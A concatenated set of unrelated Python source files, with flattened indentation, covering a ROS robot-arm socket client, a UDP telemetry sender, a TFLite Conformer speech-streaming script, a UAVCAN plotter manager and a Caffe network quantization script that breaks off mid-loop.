socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # PEP 479: plain return ends the generator; 'raise StopIteration' is a RuntimeError on Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
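# Usage sketch of this switch/case recipe (Socket_command below uses it for real):
# for case in switch(value):
#     if case(SOME_CONSTANT):
#         ...; break
#     if case():  # case() with no args always matches -> default branch
#         ...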
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent from the strategy side
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm-mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive arm speed-mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = speedmode
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##---------- socket packet transmission ----------##
##--------------- socket: send arm commands ---------------
def Socket_command():
global Socket,arm_mode_flag,data
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#------- set arm rapid & safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action = 6 ## reset to the initial mode state
print(data)
print("Socket:", Socket)
Socket.send(data.encode('utf-8')) # encode the command string and send it over the socket
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.recv(1024))
Socket_feedback()
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback():
global Socket
while 1:
feedback_str = Socket.recv(1024)
# the arm side reports its current state
if str(feedback_str[2]) == '48':# F: arm is Ready, can accept the next motion command
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T: arm is busy, cannot execute the next motion command
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6: strategy finished
state_feedback.ArmState = 6
print("shutdown")
# check the sent flag
if str(feedback_str[4]) == '48':# returned 0: false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':# returned 1: true
state_feedback.SentFlag = 1
##--------------- socket: send arm commands end ---------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##------------- socket packet transmission end -------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6 ## reset to the initial mode state
## multithreading
t = threading.Thread(target=socket_client)
t.start() # start the client thread
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## multithreading end
|
live_tool_udp.py
|
#!/usr/bin/env python
import rospy
import rospkg
import os
from std_msgs.msg import String
from geometry_msgs.msg import PoseWithCovarianceStamped, Twist, Pose2D
from humanoid_league_msgs.msg import BallRelative, ObstaclesRelative, GoalRelative, GameState, Strategy, RobotControlState
from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint
import time
import multiprocessing as mp
import yaml
import socket
from detection_msg import DetectionMsg
from position_msg import PositionMsg
from status_msg import StatusMsg
from trajectory_msg import TrajectoryMsg
DELAY_TOKEN = "SEND_DELAY"
class LiveToolSender():
def __init__(self):
self.positionMsg = PositionMsg()
self.statusMsg = StatusMsg()
self.detectionMsg = DetectionMsg()
self.trajectoryMsg = TrajectoryMsg()
self.udp_ip = rospy.get_param("/live_tool/rqt_ip")
self.udp_port = rospy.get_param("/live_tool/live_rqt_port")
self.send_delay = rospy.get_param("/live_tool/send_delay")
print("I am sending to: \nIp: "+self.udp_ip+", Port: "+str(self.udp_port)+", Delay: "+str(self.send_delay))
self.listener()
# Callbacks
def callback_ball_location(self,ballRel):
#print(ballRel)
self.detectionMsg.setBallRelative(ballRel)
#print (yaml.load(detectionMsg.getMsg()))
# rospy.loginfo(rospy.get_caller_id() + "I heard %s", ballRel)
def callback_amcl_pose(self,data):
self.positionMsg.setPoseWithCovarianceStamped(data)
def callback_gamestate(self,data):
self.statusMsg.setGameState(data)
#print(statusMsg.data)
def callback_strategy(self, data):
self.statusMsg.setStrategy(data)
def callback_obstacles_relative(self,data):
self.detectionMsg.setObstacleRelative(data)
#print (yaml.load(detectionMsg.getMsg()))
#def callback_goal_relative(data):
# detectionMsg.setGoalRelative(data)
#print (yaml.load(detectionMsg.getMsg()))
#def callback_trajectory(data):
# trajectoryMsg.setTrajectory(data)
#print (yaml.load(trajectoryMsg.getMsg()))
def callBack_cmd_vel(self,data):
self.trajectoryMsg.setCmdVel(data)
def callBack_move_base_simple(self,data):
self.trajectoryMsg.setMoveBase(data)
def callback_robot_state(self,data):
self.statusMsg.setStatusMsg(data)
# Listens to subscripted messages and send them to the Live tool
def listener(self):
# Initializes the Node
rospy.init_node('udp_listener', anonymous=False)
# Subscriptions
rospy.Subscriber("/ball_relative", BallRelative, self.callback_ball_location)
rospy.Subscriber("/amcl_pose", PoseWithCovarianceStamped, self.callback_amcl_pose)
rospy.Subscriber("/obstacles_relative", ObstaclesRelative, self.callback_obstacles_relative)
#rospy.Subscriber("/goal_relative", GoalRelative, callback_goal_relative)
rospy.Subscriber("/gamestate", GameState, self.callback_gamestate)
rospy.Subscriber("/strategy", Strategy, self.callback_strategy)
rospy.Subscriber("/robot_state", RobotControlState, self.callback_robot_state)
rospy.Subscriber("/cmd_vel", Twist, self.callBack_cmd_vel)
rospy.Subscriber("/move_base_simple/goal", Pose2D, self.callBack_move_base_simple)
# Start a process for sending the UDP packages
p = mp.Process(target=self.worker_thread)
p.daemon = True
p.start()
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
# send the data every 'send_delay' seconds
def worker_thread(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while not rospy.is_shutdown():
sock.sendto( self.positionMsg.getMsg() , (self.udp_ip, self.udp_port))
sock.sendto( self.statusMsg.getMsg() , (self.udp_ip, self.udp_port))
sock.sendto( self.trajectoryMsg.getMsg() , (self.udp_ip, self.udp_port))
sock.sendto( self.detectionMsg.getMsg() , (self.udp_ip, self.udp_port))
time.sleep(self.send_delay)
if __name__ == '__main__':
sender = LiveToolSender()
|
streaming_tflite_conformer.py
|
# Copyright 2020 Huy Le Nguyen (@usimarit)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import argparse
import soundfile as sf
import sounddevice as sd
from multiprocessing import Process, Event, Manager
import queue
import numpy as np
import tensorflow as tf
def int_or_str(text):
"""Helper function for argument parsing."""
try:
return int(text)
except ValueError:
return text
parser = argparse.ArgumentParser(prog="Conformer audio file streaming")
parser.add_argument('-l', '--list-devices', action='store_true',
help='show list of audio devices and exit')
args, remaining = parser.parse_known_args()
if args.list_devices:
print(sd.query_devices())
parser.exit(0)
parser.add_argument('filename', metavar='FILENAME',
help='audio file to be played back')
parser.add_argument('-d', '--device', type=int_or_str,
help='output device (numeric ID or substring)')
parser.add_argument('-b', '--blocksize', type=int, default=4096,
help='block size (default: %(default)s)')
parser.add_argument('-q', '--buffersize', type=int, default=20,
help='number of blocks used for buffering (default: %(default)s)')
parser.add_argument("--tflite", type=str, default=None,
help="Path to conformer tflite")
parser.add_argument("--blank", type=int, default=0,
help="Path to conformer tflite")
parser.add_argument("--num_rnns", type=int, default=1,
help="Number of RNN layers in prediction network")
parser.add_argument("--nstates", type=int, default=2,
help="Number of RNN states in prediction network (1 for GRU and 2 for LSTM)")
parser.add_argument("--statesize", type=int, default=320,
help="Size of RNN state in prediction network")
args = parser.parse_args(remaining)
if args.blocksize == 0:
parser.error('blocksize must not be zero')
if args.buffersize < 1:
parser.error('buffersize must be at least 1')
q = queue.Queue(maxsize=args.buffersize)
m = Manager()
Q = m.Queue()
E = Event()
def recognizer(Q):
tflitemodel = tf.lite.Interpreter(model_path=args.tflite)
input_details = tflitemodel.get_input_details()
output_details = tflitemodel.get_output_details()
tflitemodel.resize_tensor_input(input_details[0]["index"], [args.blocksize])
tflitemodel.allocate_tensors()
def recognize(signal, lastid, states):
if signal.shape[0] < args.blocksize:
signal = np.pad(signal, [[0, args.blocksize - signal.shape[0]]])
tflitemodel.set_tensor(input_details[0]["index"], signal)
tflitemodel.set_tensor(input_details[1]["index"], lastid)
tflitemodel.set_tensor(input_details[2]["index"], states)
tflitemodel.invoke()
upoints = tflitemodel.get_tensor(output_details[0]["index"])
lastid = tflitemodel.get_tensor(output_details[1]["index"])
states = tflitemodel.get_tensor(output_details[2]["index"])
text = "".join([chr(u) for u in upoints])
return text, lastid, states
lastid = args.blank * np.ones(shape=[], dtype=np.int32)
states = np.zeros(shape=[args.num_rnns, args.nstates, 1, args.statesize], dtype=np.float32)
transcript = ""
while True:
try:
data = Q.get()
text, lastid, states = recognize(data, lastid, states)
transcript += text
print(transcript, flush=True)
except queue.Empty:
pass
tflite_process = Process(target=recognizer, args=[Q])
tflite_process.start()
def callback(outdata, frames, time, status):
assert frames == args.blocksize
if status.output_underflow:
print('Output underflow: increase blocksize?', file=sys.stderr)
raise sd.CallbackAbort
assert not status
try:
data = q.get_nowait()
Q.put(np.frombuffer(data, dtype=np.float32))
except queue.Empty as e:
print('Buffer is empty: increase buffersize?', file=sys.stderr)
raise sd.CallbackAbort from e
if len(data) < len(outdata):
outdata[:len(data)] = data
outdata[len(data):] = b'\x00' * (len(outdata) - len(data))
raise sd.CallbackStop
else:
outdata[:] = data
try:
with sf.SoundFile(args.filename) as f:
for _ in range(args.buffersize):
data = f.buffer_read(args.blocksize, dtype='float32')
if not data:
break
q.put_nowait(data) # Pre-fill queue
stream = sd.RawOutputStream(
samplerate=f.samplerate, blocksize=args.blocksize,
device=args.device, channels=f.channels, dtype='float32',
callback=callback, finished_callback=E.set)
with stream:
timeout = args.blocksize * args.buffersize / f.samplerate
while data:
data = f.buffer_read(args.blocksize, dtype='float32')
q.put(data, timeout=timeout)
E.wait()
except KeyboardInterrupt:
parser.exit('\nInterrupted by user')
except queue.Full:
# A timeout occurred, i.e. there was an error in the callback
parser.exit(1)
except Exception as e:
parser.exit(type(e).__name__ + ': ' + str(e))
tflite_process.join()
tflite_process.close()
|
__init__.py
|
#
# Copyright (C) 2016 UAVCAN Development Team <uavcan.org>
#
# This software is distributed under the terms of the MIT License.
#
# Author: Pavel Kirienko <pavel.kirienko@zubax.com>
#
import os
import sys
import queue
import uavcan
import logging
import multiprocessing
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QTimer
from .window import PlotterWindow
logger = logging.getLogger(__name__)
try:
# noinspection PyUnresolvedReferences
sys.getwindowsversion()
RUNNING_ON_WINDOWS = True
except AttributeError:
RUNNING_ON_WINDOWS = False
PARENT_PID = os.getppid()
class IPCChannel:
"""
This class is built as an abstraction over the underlying IPC communication channel.
"""
def __init__(self):
# Queue is slower than pipe, but it allows to implement non-blocking sending easier,
# and the buffer can be arbitrarily large.
self._q = multiprocessing.Queue()
def send_nonblocking(self, obj):
try:
self._q.put_nowait(obj)
except queue.Full:
pass
def receive_nonblocking(self):
"""Returns: (True, object) if successful, (False, None) if no data to read """
try:
return True, self._q.get_nowait()
except queue.Empty:
return False, None
IPC_COMMAND_STOP = 'stop'
def _process_entry_point(channel):
logger.info('Plotter process started with PID %r', os.getpid())
app = QApplication(sys.argv) # Inheriting args from the parent process
def exit_if_should():
# os.getppid() semantics differ on Windows, so the orphan check is skipped there
if not RUNNING_ON_WINDOWS and os.getppid() != PARENT_PID:  # Parent is dead
logger.info('Parent process is dead, exiting')
app.exit(0)
exit_check_timer = QTimer()
exit_check_timer.setSingleShot(False)
exit_check_timer.timeout.connect(exit_if_should)
exit_check_timer.start(2000)
def get_transfer():
received, obj = channel.receive_nonblocking()
if received:
if obj == IPC_COMMAND_STOP:
logger.info('Plotter process has received a stop request, goodbye')
app.exit(0)
else:
return obj
win = PlotterWindow(get_transfer)
win.show()
logger.info('Plotter process %r initialized successfully, now starting the event loop', os.getpid())
sys.exit(app.exec_())
class CompactMessage:
"""
Transfer and message objects from Pyuavcan cannot be exchanged between processes,
so we build this minimal representation that is just enough to mimic a Pyuavcan message object.
"""
def __init__(self, uavcan_data_type_name):
self._uavcan_data_type_name = uavcan_data_type_name
self._fields = {}
def __repr__(self):
return '%s(%r)' % (self._uavcan_data_type_name, self._fields)
def _add_field(self, name, value):
self._fields[name] = value
def __getattr__(self, item):
if item not in ('_fields', '_uavcan_data_type_name'):
try:
return self._fields[item]
except KeyError:
pass
try:
return getattr(uavcan.TYPENAMES[self._uavcan_data_type_name](), item)
except KeyError:
pass
raise AttributeError(item)
# noinspection PyProtectedMember
def _extract_struct_fields(m):
if isinstance(m, uavcan.transport.CompoundValue):
out = CompactMessage(uavcan.get_uavcan_data_type(m).full_name)
for field_name, field in uavcan.get_fields(m).items():
if uavcan.is_union(m) and uavcan.get_active_union_field(m) != field_name:
continue
val = _extract_struct_fields(field)
if val is not None:
out._add_field(field_name, val)
return out
elif isinstance(m, uavcan.transport.ArrayValue):
# string-like arrays collapse to bytes, any other array becomes a list
container = bytes if uavcan.get_uavcan_data_type(m).is_string_like else list
return container(filter(lambda x: x is not None, (_extract_struct_fields(item) for item in m)))
elif isinstance(m, uavcan.transport.PrimitiveValue):
return m.value
elif isinstance(m, (int, float, bool)):
return m
elif isinstance(m, uavcan.transport.VoidValue):
pass
else:
raise ValueError('Unsupported value type: %r' % type(m))
class MessageTransfer:
def __init__(self, tr):
self.source_node_id = tr.source_node_id
self.ts_mono = tr.ts_monotonic
self.data_type_name = uavcan.get_uavcan_data_type(tr.payload).full_name
self.message = _extract_struct_fields(tr.payload)
class PlotterManager:
def __init__(self, node):
self._node = node
self._inferiors = [] # process object, channel
self._hook_handle = None
def _transfer_hook(self, tr):
if tr.direction == 'rx' and not tr.service_not_message and len(self._inferiors):
msg = MessageTransfer(tr)
for proc, channel in self._inferiors[:]:
if proc.is_alive():
try:
channel.send_nonblocking(msg)
except Exception:
logger.error('Failed to send data to process %r', proc, exc_info=True)
else:
logger.info('Plotter process %r appears to be dead, removing', proc)
self._inferiors.remove((proc, channel))
def spawn_plotter(self):
channel = IPCChannel()
if self._hook_handle is None:
self._hook_handle = self._node.add_transfer_hook(self._transfer_hook)
proc = multiprocessing.Process(target=_process_entry_point, name='plotter', args=(channel,))
proc.daemon = True
proc.start()
self._inferiors.append((proc, channel))
logger.info('Spawned new plotter process %r', proc)
def close(self):
try:
self._hook_handle.remove()
except Exception:
pass
for _, channel in self._inferiors:
try:
channel.send_nonblocking(IPC_COMMAND_STOP)
except Exception:
pass
for proc, _ in self._inferiors:
try:
proc.join(1)
except Exception:
pass
for proc, _ in self._inferiors:
try:
proc.terminate()
except Exception:
pass
|
quantize_yolov2-tiny-my2.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# Quantize Fast R-CNN based Network
# Written by Chia-Chi Tsai
# --------------------------------------------------------
"""Quantize a Fast R-CNN network on an image database."""
import os
os.environ['GLOG_minloglevel'] = '2'
import _init_paths_yolo
from fast_rcnn.test import test_net, test_net_silent, im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
from datasets.factory import get_imdb
import caffe
import argparse
import pprint
import time, os, sys
import numpy as np
from caffe.proto import caffe_pb2
import google.protobuf.text_format as txtf
import math
import cv2
from utils.timer import Timer
import multiprocessing
import json
import shutil
import warnings
warnings.filterwarnings("ignore")
from utils.timer import Timer
from subprocess import check_output
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Quantize a Fast R-CNN network')
parser.add_argument('--gpu', dest='gpu_id', help='GPU id to use',
default=0, type=int)
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant', dest='prototxt_quantized',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant_BAC', dest='prototxt_quantized_BAC',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--act_analysis', dest='act_analysis',
help='input and output analysis file',
default=None, type=str)
parser.add_argument('--accumulator_analysis', dest='accumulator_analysis',
help='adder and multiplier analysis file',
default=None, type=str)
parser.add_argument('--net', dest='caffemodel',
help='model to test',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file', default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--comp', dest='comp_mode', help='competition mode',
action='store_true')
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--vis', dest='vis', help='visualize detections',
action='store_true')
parser.add_argument('--num_dets', dest='max_per_image',
help='max number of detections per image',
default=100, type=int)
parser.add_argument('--error_margin', dest='error_margin',
help='tolerance error of quantized network',
default=0.1, type=float)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def analyze_network(net_proto):
has_fc = False
has_deconv = False
has_conv = False
for l in net_proto.layer:
if l.type == 'Convolution':
has_conv = True
elif l.type == 'Deconvolution':
has_deconv = True
elif l.type =='InnerProduct':
has_fc = True
return has_conv, has_deconv, has_fc
# convert network to quantized network with 32 bit width
def convert_net_to_qnet(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='InnerProduct':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='Deconvolution':
l.type = 'DeconvolutionRistretto'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
write_to_prototxt(net_proto, q_net_path)
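# Illustrative example of the in-place blob renaming above (layer names are
# made up): for a chain  conv1 -> relu1 -> conv2  where relu1 runs in place
# (top == bottom),
#   before: relu1: bottom 'conv1', top 'conv1'     conv2: bottom 'conv1'
#   after:  relu1: bottom 'conv1', top 'conv1/t'   conv2: bottom 'conv1/t'
# so every quantized layer sees uniquely named input and output blobs.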
# convert quantized network into BAC (bit-accurate) analysis mode with 32 bit accumulators
def convert_net_to_qnet_BAC_analysis(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
write_to_prototxt(net_proto, q_net_path)
# switch BAC analysis layers back to bit-accurate execution (analyze_mode = 0)
def convert_net_to_qnet_BAC(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
write_to_prototxt(net_proto, q_net_path)
#change single layer bit width
def change_layer_bw(net_proto, layer_name,
bw_layer_in, fl_layer_in,
bw_layer_out, fl_layer_out,
bw_params, fl_params,
bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.precision = 0
l.quantization_param.bw_layer_in = int(bw_layer_in)
l.quantization_param.bw_layer_out = int(bw_layer_out)
l.quantization_param.bw_params = int(bw_params)
l.quantization_param.bw_add = int(bw_add)
l.quantization_param.bw_multiply = int(bw_multiply)
l.quantization_param.fl_layer_in = int(fl_layer_in)
l.quantization_param.fl_layer_out= int(fl_layer_out)
l.quantization_param.fl_params = int(fl_params)
l.quantization_param.fl_add = int(fl_add)
l.quantization_param.fl_multiply = int(fl_multiply)
return net_proto
def change_layer_BAC_bw(net_proto, layer_name,
                        bw_add, fl_add,
                        bw_multiply, fl_multiply):
    for l in net_proto.layer:
        if l.name == layer_name:
            l.quantization_param.bw_add = bw_add
            l.quantization_param.fl_add = fl_add
            l.quantization_param.bw_multiply = bw_multiply
            l.quantization_param.fl_multiply = fl_multiply
    return net_proto
def change_layer_bottom_name(net_proto, layer_name,
layer_bottom_name):
for l in net_proto.layer:
if l.name == layer_name:
l.bottom = layer_bottom_name
return net_proto
def change_layer_top_name(net_proto, layer_name,
layer_top_name):
for l in net_proto.layer:
if l.name == layer_name:
l.top = layer_top_name
return net_proto
#calculate needed Integer Length of layer parameters
def calc_layer_param_IL(net,layer):
    percentile = 0.
    layer_param = net.params[layer.name]
    #max_weight = max(layer_param[0].data[...].max(), layer_param[0].data[...].min(), key=abs)
    weight_sorted = np.sort(layer_param[0].data[...], axis=None)
    # take the largest-magnitude value from both tails after trimming
    # `percentile` of each end; the original -1*int(...) index degenerated to
    # weight_sorted[0] when percentile == 0 and never looked at the maximum
    max_weight = max(weight_sorted[int(len(weight_sorted)*percentile)], weight_sorted[-1 - int(len(weight_sorted)*percentile)], key=abs)
    if layer.convolution_param.bias_term:
        bias_sorted = np.sort(layer_param[1].data[...], axis=None)
        max_bias = max(bias_sorted[int(len(bias_sorted)*percentile)], bias_sorted[-1 - int(len(bias_sorted)*percentile)], key=abs)
        #max_bias = max(layer_param[1].data[...].max(), layer_param[1].data[...].min(), key=abs)
    else:
        max_bias = 0
    #print layer.name, max_weight, max(weight_sorted[0],weight_sorted[-1],key=abs), max(weight_sorted[int(len(weight_sorted)/100)], weight_sorted[-1*int(len(weight_sorted)/100)],key=abs)
    max_param = max(max_weight, max_bias, key=abs)
    return math.ceil(math.log(abs(max_param), 2)) + 1
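# Worked example (hypothetical numbers): if the largest-magnitude parameter is
# 2.5, then ceil(log2(2.5)) + 1 = ceil(1.32) + 1 = 3 integer bits; the extra
# +1 presumably accounts for the sign bit of the dynamic fixed point format.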
def analyze_net_param_IL(net, net_proto):
net_param_IL = dict()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_param_IL[layer.name] = calc_layer_param_IL(net, layer)
return net_param_IL
#calculate needed Integer Length of a layer input/output blob
def calc_layer_inout_IL(net, layer_bottom_name):
layer_output = net.blobs[layer_bottom_name].data
layer_output_max = abs(max(layer_output.max(), layer_output.min(), key=abs))
#if layer_bottom_name == 'data':
# print net.blobs[layer_bottom_name].data
# print math.ceil(math.log(layer_output_max, 2)) + 1
return math.ceil(math.log(layer_output_max, 2)) + 1
def analyze_net_output_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_output_IL = dict()
net_input_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
net_output_IL[layer.name] = -sys.maxint - 1
net_input_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_iters):
#if cfg.TEST.HAS_RPN:
# box_proposals = None
#else:
# box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
#im = cv2.imread(imdb.image_path_at(i))
#scores, boxes = im_detect(net, im, _t, box_proposals)
net.forward()
for layer in net_proto.layer:
